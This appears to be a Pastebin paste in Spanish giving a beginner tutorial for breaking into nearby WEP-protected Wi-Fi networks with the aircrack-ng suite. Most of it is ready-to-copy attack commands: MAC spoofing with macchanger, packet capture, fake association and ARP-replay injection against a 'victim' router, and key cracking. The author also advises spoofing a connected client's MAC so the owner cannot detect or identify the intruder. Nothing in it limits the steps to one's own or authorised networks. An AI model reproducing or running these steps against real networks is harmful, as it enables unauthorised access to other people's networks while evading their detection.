Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Wenas peña aquí les dejo un tuto que espero les ayude mucho y para aquellos que tienen linux ya sea ubuntu o cualquier versión pueden conseguir aircrack desde una shell fácilmente:
- Abre una ventana de terminal (o consola) y escribe lo siguiente:
- apt-get install aircrack-ng
- Y para cambiar tu mac necesitas:
- apt-get install macchanger
- OK pues nada, ahora lo bueno espero que les guste y les ayude mucho,
- Voy a ponerlo por pasos porque tendremos que volver para atrás desde el paso nº5 para poner una mac creíble o que ya este asociada con el router.
- Paso 1 abre una ventana de terminal y escribe lo siguiente:
- airmon-ng
- Aquí te va a decir cual es tu tarjeta inalámbrica, lo normal es que salga wlan0, o eth0, o eth1, cosas así por el estilo, tu te vas a dar cuenta de cual es la tuya, en mi caso es la wlan0 así que es la que voy a usar, tu utiliza la tuya ok.
- Paso 2 introduce los siguientes comandos:
- airmon-ng stop wlan0
- ifconfig wlan0 down
- Con esto deshabilitas la tarjeta de red inalámbrica para hacerle un cambio de mac, si esta habilitada no te dejara cambiar de mac, cambiaras tu mac por dos razones importantes:
- 1. Para que así no haya problemas de que te puedan detectar e impedirte futuras conexiones.
- 2. Con tu mac real pueden llegar hasta ti, tu nombre, tus datos y eso no mola nada.
- Paso 3 para cambiar la mac escribe los siguientes comandos:
- macchanger --mac 00:11:22:33:44:55 wlan0 (esta mac no es solo un ejemplo sirve)
- Lo malo que últimamente da problemas por eso en el paso 5 tendremos que volver al paso 2 y seguir de nuevo
- Paso 4 habilita tu tarjeta:
- airmon-ng start wlan0
- Con el paso 3 se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55
- y con el paso 4 habilitaste nuevamente tu tarjeta de red inalámbrica
- Paso 5 ahora vas a proceder a ver las redes inalámbricas que están a tu alcance con el siguiente comando:
- airodump-ng wlan0
- Va a salir la lista de las redes inalámbricas, donde dice el BSSID (mac del router que da la señal), PWR (Poder de señal cuanto mas bajo mejor ej: -10 es mas furte que -80), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseña que tiene la red, este tutorial es solo para WEP) ESSID (Nombre de la red inalambrica) STATION ( es la mac del pc que esta conectado al router)
- Se que son mas datos los que se muestran, pero esos no son de importancia, solo vamos a utilizar los que mencione.
- Cuando selecciones la red inalámbrica que vamos a atacar aprieta Ctrl + C para parar el proceso y con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar y lo pegamos en un documento de texto y hacemos lo mismo con la station y volvemos al paso 2.
- Para explicar bien esta parte vamos a poner un ejemplo:
- STATION 00:11:22:33:44:55
- BSSID 66:77:88:99:00:11
- CHN 6
- ESSID JAZZTEL_70 o la que sea estos datos son los que usaremos, en este punto copiamos la station que es la mac del pc asociada ya con ese router y volvemos al paso 2 para cambiar nuestra mac por esta que es la que funciona seguro,
- Paso 6 ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente comando:
- airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0
- Donde:
- -c es el numero del canal de la red que estamos atacando
- -w es el archivo donde se van a guardar los paquetes que captures (por defecto están en la dirección /root)
- --bssid es la mac del router de la red que estamos atacando
- wlan0 es nuestra tarjeta inalámbrica
- STATION es la mac del pc que esta conectado al bssid esta mac es la que hay que usar para asociar 100%
- Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los paquetes que llevamos capturados o no, si no captura paquetes DATA es que no hay ningun pc conectado al ruoter para poder descifrar una clave wep es necesario 20,000 paquetes o mas.
- Si no esta generando trafico y te podría llevar días incluso semanas llegar a los 20,000 paquetes,
- Pero no te preocupes que ahora te enseñare como generar tráfico en la red.
- Paso 7 para asociarte abre otra terminal (consola) donde introducirás los siguientes comandos:
- aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0
- Donde:
- -a es el bssid de la red que estamos atacando
- -h es la mac falsa que le introducimos a tu tarjeta de red inalámbrica
- -e es el nombre de la red que estamos atacando
- Luego cuando salgan 4 líneas de códigos y te diga que la conexión esta succesfull, esto significa que estas conectado en capa 2 al router de la red que estamos atacando.
- Si por alguna razón no se puede conectar (unsuccesfull) algunas de las razones son las siguientes:
- -La red a la que quieres atacar esta muy lejos, aconsejo que tengas mínimo de tres rallas de señal.
- -Tu tarjeta de red no puede hacer inyección de paquetes.
- -El router tiene seguridad para evitar este tipo de ataques.
- Paso 8 ahora para inyectarle el trafico introduce el siguientes comando:
- aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0
- Donde:
- -b es el bssid de la red que estamos atacando
- -h es la mac falsa que le introducimos a tu tarjeta de red inalámbrica
- Veras que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas capturando los paquetes te darás cuenta que la DATA va caminando muy rápido.
- Paso 9 ahora abre otra terminal (consola) aquí es donde vamos a ejecutar el ataque final que es utilizar los datos capturados para buscar la contraseña e introduce los siguientes comandos código:
- aircrack-ng prueba-01.cap
- Y también puedes usar este que une todos los paquetes, código:
- aircrack-ng *.cap
- EJ: -01.cap, -02.cap, -03.cap esto es por si dejas el ataque para otro momento o si en el paso de inyectar le diste a ctrl.+c y vuelves a intentarlo ya no te crea el -01.cap te creara el -02.cap así los juntas y no pierdes ese paquete)
- Donde:
- -Prueba-01.cap es el archivo donde se están capturando los datos
- Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la contraseña se a descifrado, y te la mostrara al lado derecho de la siguiente forma:
- Key found [XX:XX:XX:XX:XX:XX]
- Donde las XX son las letras o números de la contraseña, por ejemplo:
- Si te muestra [12:34:56:78:90]
- La contraseña para esa red inalámbrica seria 1234567890.
- Bueno para aquellos que quieren probar aquí les pongo todos los comandos en el orden que debe de ser para que solo le den copiar:
- Paso 1 # airmon-ng
- Paso 2 # airmon-ng stop wlan0
- # ifconfig wlan0 down
- paso3 # macchanger –mac 00:11:22:33:44:55 wlan0
- paso 4 # airmon-ng start wlan0
- paso 5 # airodump-ng wlan0 ( aquí cogeremos la estation del bssid que atacamos y volvemos al paso 2 si no hay ninguna station con nuestra bssid cogemos la que sea porque por lo menos sera real y dará menos problemas.
- # airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
- # aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
- # aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
- # aircrack-ng nombredelarchivo.cap
- Como se darán cuenta son pocos comandos pero llevan mucha explicación y lo trate de hacer de una forma entendible
- Para aquellos que quieren probar otras formas de inyección aquí les dejo otras dos formas que me han funcionado perfecto.
- Forma 2:
- # aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
- # aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
- Verificar si el BSSID es el que estamos atacando
- Forma 3:
- # aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
- # aireplay-ng -5 -b <BSSID> -h <mac> wlan0
- Ver como se llama el archivo .xor
- # packetforge-ng -0 -a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y <archivo .xor> -w ARP
- # aireplay-ng -2 -r ARP wlan0
- Solo aclarar que este tuto es para novatos, por lo que para alguien con algo de experiencia no tiene que pasar del paso 5 al 2 y seguir Bastaría con saltarse algunos pasos EJ:
- airmon-ng start wlan0
- airodump-ng wlan0 escogemos la mac y la station pulsamos ctrl+c para parar todo las copiamos y recordamos el canal CH ej: 3,
- airmon-ng stop wlan0
- ifconfig wlano down
- macchanger –mac 0B:A1:89:10:26:B0 wlan0
- airodump-ng wlan0 –c 3 (como ves ahora si que he puesto el canal para eliminar distracciones y centrarnos en la victima)
- airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
- aireplay-ng -1 0 -a (bssid) -h 0B:A1:89:10:26:B0 -e (essid) wlan0
- aireplay-ng -3 -b (bssid) -h 0B:A1:89:10:26:B0 wlan0
- aircrack-ng nombredelarchivo.cap
- PD: No es mio!!., solo lo pille :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement